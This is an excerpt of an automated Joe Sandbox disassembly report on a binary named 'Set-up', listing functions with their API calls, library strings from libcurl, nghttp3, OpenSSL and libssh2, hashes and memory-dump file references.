Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: fwrite
String ID: # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.$%d%02d%02d %02d:%02d:%02d$%s%s "%d%02d%02d %02d:%02d:%02d"$%s%s "%s"$hsts.c$mite$unlimited
API String ID: 3559309478-3911685517
Opcode ID: 6bdb4031d82edfcd8153abd11c3f6a6c80d8503604b0a0d4da44ae231b01d87d
Instruction ID: 8e9d1b599a0b3f189284bcdbc64f15888006a4d7b987d83f0020aba48a450dbb
Opcode Fuzzy Hash: 6bdb4031d82edfcd8153abd11c3f6a6c80d8503604b0a0d4da44ae231b01d87d
Instruction Fuzzy Hash: 2981E4B2A08301ABEB15DF24DD42B2BB7F9AF94714F08452CF95997252EB31DD10C7A2

Function 00B06210 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 184COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(stream->outq_idx + 1 >= npopped,nghttp3_stream.c,000003CE,?,00000000,00ADDB9C,?,00B03BB8,00000000,?,?), ref: 00B06433

Strings

nghttp3_ringbuf_len(chunks), xrefs: 00B064B0
chunk->begin == tbuf->buf.begin, xrefs: 00B064C5
stream_pop_outq_entry, xrefs: 00B0647D
stream->outq_idx + 1 >= npopped, xrefs: 00B0642E
chunk->end == tbuf->buf.end, xrefs: 00B0649B
nghttp3_stream.c, xrefs: 00B06429, 00B06487, 00B06496, 00B064AB, 00B064C0

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _assert
String ID: chunk->begin == tbuf->buf.begin$chunk->end == tbuf->buf.end$nghttp3_ringbuf_len(chunks)$nghttp3_stream.c$stream->outq_idx + 1 >= npopped$stream_pop_outq_entry
API String ID: 1222420520-1470553442
Opcode ID: 66f615a7cbb7e5811c5725d1b2585f993a422cd7818caa5d718b28bb7c25d37e
Instruction ID: 57dc527f52e9c6d7ad1a1c710157cfb335b47b023fbb5e16fd0e48bff61be870
Opcode Fuzzy Hash: 66f615a7cbb7e5811c5725d1b2585f993a422cd7818caa5d718b28bb7c25d37e
Instruction Fuzzy Hash: 6F716C70604344AFDB25DF28D895BAE7BE1FF44704F048568F9899B391EB70EA50CB92

Function 00A7E760 Relevance: 16.9, APIs: 1, Strings: 10, Instructions: 448COMMON

Download Yara Rule

APIs

Part of subcall function 00A85EB0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00A85ED4

Part of subcall function 00AA4F40: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00AA4F9E

atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 00A7EA9B

Part of subcall function 00A806F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00A85663,?), ref: 00A806F9

Strings

GET, xrefs: 00A7ED95
Switch from POST to GET, xrefs: 00A7ED2B
Clear auth, redirects to port from %u to %u, xrefs: 00A7EB1B
Maximum (%ld) redirects followed, xrefs: 00A7EC11
HEAD, xrefs: 00A7ED9A, 00A7EDA2
Clear auth, redirects scheme from %s to %s, xrefs: 00A7EB84
The redirect target URL could not be parsed: %s, xrefs: 00A7E9E1
Switch to %s, xrefs: 00A7EDA3
Issue another request to this URL: '%s', xrefs: 00A7ECA4
transfer.c, xrefs: 00A7E7F2, 00A7E97C, 00A7EA7D, 00A7EAA5, 00A7EAE1, 00A7EB46, 00A7EB92, 00A7EBA8, 00A7EBCA, 00A7EC43

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strlen$atoistrcpy
String ID: Clear auth, redirects scheme from %s to %s$Clear auth, redirects to port from %u to %u$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET$Switch to %s$The redirect target URL could not be parsed: %s$transfer.c
API String ID: 2444498485-4197959747
Opcode ID: fd324b39de2d82eee49299873d4017b931ce6138ac52e08899a198ea0ef00bc1
Instruction ID: 44a58dd982b68cfbdb8b0a912803bd21dbc0dc2090a111fa35eb724132aa7edf
Opcode Fuzzy Hash: fd324b39de2d82eee49299873d4017b931ce6138ac52e08899a198ea0ef00bc1
Instruction Fuzzy Hash: 4CF1E175A003006BEB20DF24DD86BAA3B95AF59704F08C4B5FD4DAE2D3E771D91487A2

Function 00C5A300 Relevance: 16.9, APIs: 2, Strings: 9, Instructions: 446stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PRIVATE KEY), ref: 00C5A61C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ENCRYPTED PRIVATE KEY), ref: 00C5A632

Part of subcall function 00C5A0B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00C5A654,?,PRIVATE KEY), ref: 00C5A0BD
Part of subcall function 00C5A0B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,PRIVATE KEY), ref: 00C5A0C8
Part of subcall function 00C5A0B0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,PRIVATE KEY), ref: 00C5A0DF

Part of subcall function 00BD38A0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00BD397E

Strings

PARAMETERS, xrefs: 00C5A5CF
ENCRYPTED PRIVATE KEY, xrefs: 00C5A62C
PEM, xrefs: 00C5A3FF
pem_read_bio_key_legacy, xrefs: 00C5A7F8, 00C5A827
ANY PRIVATE KEY, xrefs: 00C5A6B4
crypto/pem/pem_pkey.c, xrefs: 00C5A555, 00C5A802, 00C5A831, 00C5A85C, 00C5A872
PUBLIC KEY, xrefs: 00C5A5D4, 00C5A5F1
pem_read_bio_key_decoder, xrefs: 00C5A54E
PRIVATE KEY, xrefs: 00C5A616, 00C5A649

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strcmpstrlen
String ID: ANY PRIVATE KEY$ENCRYPTED PRIVATE KEY$PARAMETERS$PEM$PRIVATE KEY$PUBLIC KEY$crypto/pem/pem_pkey.c$pem_read_bio_key_decoder$pem_read_bio_key_legacy
API String ID: 3853617425-3686562516
Opcode ID: 14fb14fd694e185e5254d4a95958bb3415e14243c7b763182fe08ac6bfeac54d
Instruction ID: 433cb530b7ce3e167c097ffaf50e1a7fe8df0a3f8c3725a3aad9e529d8095ff3
Opcode Fuzzy Hash: 14fb14fd694e185e5254d4a95958bb3415e14243c7b763182fe08ac6bfeac54d
Instruction Fuzzy Hash: 51D130B6E043007BD7217A219C03F5F76E89F95745F040628FD58A7183FA71ED8896A7

Function 00B4C290 Relevance: 16.8, APIs: 1, Strings: 10, Instructions: 318COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000010,?,00000100), ref: 00B4C60E

Strings

Would block sending FXP_OPEN or FXP_OPENDIR command, xrefs: 00B4C410
Response too small, xrefs: 00B4C4E3
feWould block waiting for status message, xrefs: 00B4C4A6
Unable to allocate new SFTP handle structure, xrefs: 00B4C646
Too small FXP_HANDLE, xrefs: 00B4C582, 00B4C675
Too small FXP_STATUS, xrefs: 00B4C517
Timeout waiting for status message, xrefs: 00B4C4FB
Unable to allocate memory for FXP_OPEN or FXP_OPENDIR packet, xrefs: 00B4C444
Failed opening remote file, xrefs: 00B4C531
Unable to send FXP_OPEN*, xrefs: 00B4C45B

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: Failed opening remote file$Response too small$Timeout waiting for status message$Too small FXP_HANDLE$Too small FXP_STATUS$Unable to allocate memory for FXP_OPEN or FXP_OPENDIR packet$Unable to allocate new SFTP handle structure$Unable to send FXP_OPEN*$Would block sending FXP_OPEN or FXP_OPENDIR command$feWould block waiting for status message
API String ID: 3510742995-1499184223
Opcode ID: eadb3b8a81fe9fa7c47637444da73006b78bce169ce5950075f560ef655d678c
Instruction ID: 1c5177a3cfa7001d557ce64999b8a06925c32d471174333adbc20bd51e8e3b57
Opcode Fuzzy Hash: eadb3b8a81fe9fa7c47637444da73006b78bce169ce5950075f560ef655d678c
Instruction Fuzzy Hash: 10B14AB09047419FDB10CF24DC81B6B7BE8FF94718F044A6CF45692292E771DA18DB62

Function 00AAE270 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 303stringCOMMON

Download Yara Rule

APIs

strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002F,?,?,?,?,?,00000000,?,?,?,?,?,?,00AACC57), ref: 00AAF028

Strings

%s%s%s, xrefs: 00AAF07B
ftp.c, xrefs: 00AAF08A, 00AAF0BD, 00AAF13C
SIZE %s, xrefs: 00AAE406
[%s] -> [%s], xrefs: 00AAE2E0, 00AAE38E, 00AAF116, 00AAF203
STOR_PREQUOTE, xrefs: 00AAF1F7
TYPE %c, xrefs: 00AAE323
LIST, xrefs: 00AAF059, 00AAF10A
NLST, xrefs: 00AAF05E, 00AAF07A

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strrchr
String ID: %s%s%s$LIST$NLST$SIZE %s$STOR_PREQUOTE$TYPE %c$[%s] -> [%s]$ftp.c
API String ID: 3418686817-2910492138
Opcode ID: 0fd495040c0aaabc69a228cbd980dd3b6ef6fe1d98e7aea260fc269a4611512b
Instruction ID: f8bf770789b21a52495c0552c63aaf5f6272ff733d52022ef0d63906d1592db6
Opcode Fuzzy Hash: 0fd495040c0aaabc69a228cbd980dd3b6ef6fe1d98e7aea260fc269a4611512b
Instruction Fuzzy Hash: 06A101B1700304ABEB259B689C05BA776D9EB93308F0C417DE9498B2C3E3B6DD45D7A0

Function 00B4E420 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,00A91887,?,?,00000000,?,00000000,00000007), ref: 00B4E43D

Strings

Server does not support RENAME, xrefs: 00B4E4B9
SFTP Protocol Error, xrefs: 00B4E63E
SFTP rename packet too short, xrefs: 00B4E5F9
Error waiting for FXP STATUS, xrefs: 00B4E64F
File already exists and SSH_FXP_RENAME_OVERWRITE not specified, xrefs: 00B4E673
Operation Not Supported, xrefs: 00B4E67A
Unable to allocate memory for FXP_RENAME packet, xrefs: 00B4E66A
Unable to send FXP_RENAME command, xrefs: 00B4E661

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _time64
String ID: Error waiting for FXP STATUS$File already exists and SSH_FXP_RENAME_OVERWRITE not specified$Operation Not Supported$SFTP Protocol Error$SFTP rename packet too short$Server does not support RENAME$Unable to allocate memory for FXP_RENAME packet$Unable to send FXP_RENAME command
API String ID: 1670930206-3556387644
Opcode ID: b05525d405267684a4149e477c4a6bbc5bbfebde54639082359bf363d88b3843
Instruction ID: 1a2f06a32b9ddeeeae089093bc8c9618d502469dd3b2546bed7ee4e611de4b96
Opcode Fuzzy Hash: b05525d405267684a4149e477c4a6bbc5bbfebde54639082359bf363d88b3843
Instruction Fuzzy Hash: 7671D571604300AFD7209F24DC85B6B7BE4FF51314F05499DF9AA872A2E731DA14EB62

Function 00B0A8E0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 122COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000018,?,?), ref: 00B0A9E8
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i < blk->n,nghttp3_ksl.c,000002C3,?,?,?,?,?,00B071B7,00000001,?,?), ref: 00B0AA04
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(key_equal(ksl->compar, (nghttp3_ksl_key *)node->key, old_key),nghttp3_ksl.c,000002C7,?,00B071B7,00000001,?,?), ref: 00B0AA19
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ksl->head,nghttp3_ksl.c,000002BE,?,?,?,?,?,00B071B7,00000001,?,?), ref: 00B0AA2E

Strings

i < blk->n, xrefs: 00B0A9FF
key_equal(ksl->compar, (nghttp3_ksl_key *)node->key, old_key), xrefs: 00B0AA14
nghttp3_ksl.c, xrefs: 00B0A9FA, 00B0AA0F, 00B0AA24
ksl->head, xrefs: 00B0AA29

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _assert$memcpy
String ID: i < blk->n$key_equal(ksl->compar, (nghttp3_ksl_key *)node->key, old_key)$ksl->head$nghttp3_ksl.c
API String ID: 3718630003-2514804127
Opcode ID: 2e310be10c768c0484b7a062b0d55ab417a4e15a2f5bf66a80946c431bd3ca1a
Instruction ID: c93e7e3432fb643edb5362777902ea8f37728e2e9f9c34ef942a920d7fc8ad4c
Opcode Fuzzy Hash: 2e310be10c768c0484b7a062b0d55ab417a4e15a2f5bf66a80946c431bd3ca1a
Instruction Fuzzy Hash: 75418A712043089FDB00DF15CD85F5A7BE5FF58349F0A4898E4899B2A2E732D959CB63

Function 00CA2370 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 86encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000), ref: 00CA238F
CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000), ref: 00CA23C4
GetLastError.KERNEL32 ref: 00CA2433

Part of subcall function 00CA2240: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,00C9F763,?,?,?,?,?), ref: 00CA2251
Part of subcall function 00CA2240: WideCharToMultiByte.KERNEL32 ref: 00CA2284
Part of subcall function 00CA2240: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 00CA22BD

Strings

ERR_CAPI_error, xrefs: 00CA23F9
engines/e_capi.c, xrefs: 00CA23A4, 00CA2426, 00CA2466
%lX, xrefs: 00CA243E
Error code= 0x, xrefs: 00CA244F
engines/e_capi_err.c, xrefs: 00CA2400
capi_cert_get_fname, xrefs: 00CA2379

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ByteCertCertificateCharContextMultiPropertyWide$ErrorLastwcslen
String ID: %lX$ERR_CAPI_error$Error code= 0x$capi_cert_get_fname$engines/e_capi.c$engines/e_capi_err.c
API String ID: 3049598375-4146664032
Opcode ID: 8d74e6bff823e8e20886849e5515c7e79ae213839e236170e927897782a4825a
Instruction ID: 401a071d88855f26b2034b99a1afd8ba40e3564859d0005a91abe15a94497724
Opcode Fuzzy Hash: 8d74e6bff823e8e20886849e5515c7e79ae213839e236170e927897782a4825a
Instruction Fuzzy Hash: 7F21EB71B403017BE6203666BC47F3B356DDB97F09F004538FA48AD1C7E69A4615A6A2

Function 00A90762 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 377stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00A90794

Part of subcall function 00B4F340: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,00A900B0,?,?,00000000,00000000,?), ref: 00B4F35D

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00A9356E

Strings

Unknown error in libssh2, xrefs: 00A9386C, 00A93874
Bad file size (%lld), xrefs: 00A94D42
Creating the dir/file failed: %s, xrefs: 00A93875
Upload failed: %s (%lu/%d), xrefs: 00A94719
Failed to read data, xrefs: 00A94CD7
ssh error, xrefs: 00A9470D, 00A94718
Could not seek stream, xrefs: 00A94D26

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strlen$_time64
String ID: Bad file size (%lld)$Could not seek stream$Creating the dir/file failed: %s$Failed to read data$Unknown error in libssh2$Upload failed: %s (%lu/%d)$ssh error
API String ID: 2413861649-3110757985
Opcode ID: 7ba05ad47c80bbb4f3cecb0f8df3bbd7a3ad213487104f967d308a6422e40b17
Instruction ID: 89884c645fd719a4767e04b3bc295b76abbdd6089801e14a6b1c85106cee2358
Opcode Fuzzy Hash: 7ba05ad47c80bbb4f3cecb0f8df3bbd7a3ad213487104f967d308a6422e40b17
Instruction Fuzzy Hash: CCE19EB1B046019FDB14DF28C885F6AB7E5BB88304F148678F9598B352DB71AE05CB92

Function 00AC48F0 Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 349COMMON

Download Yara Rule

APIs

memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00AC491A
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00AC497C
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00AC49F1
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00AC4ABB
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00AC4B21
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00AC4BCF
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00AC4C33
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00AC4CDD
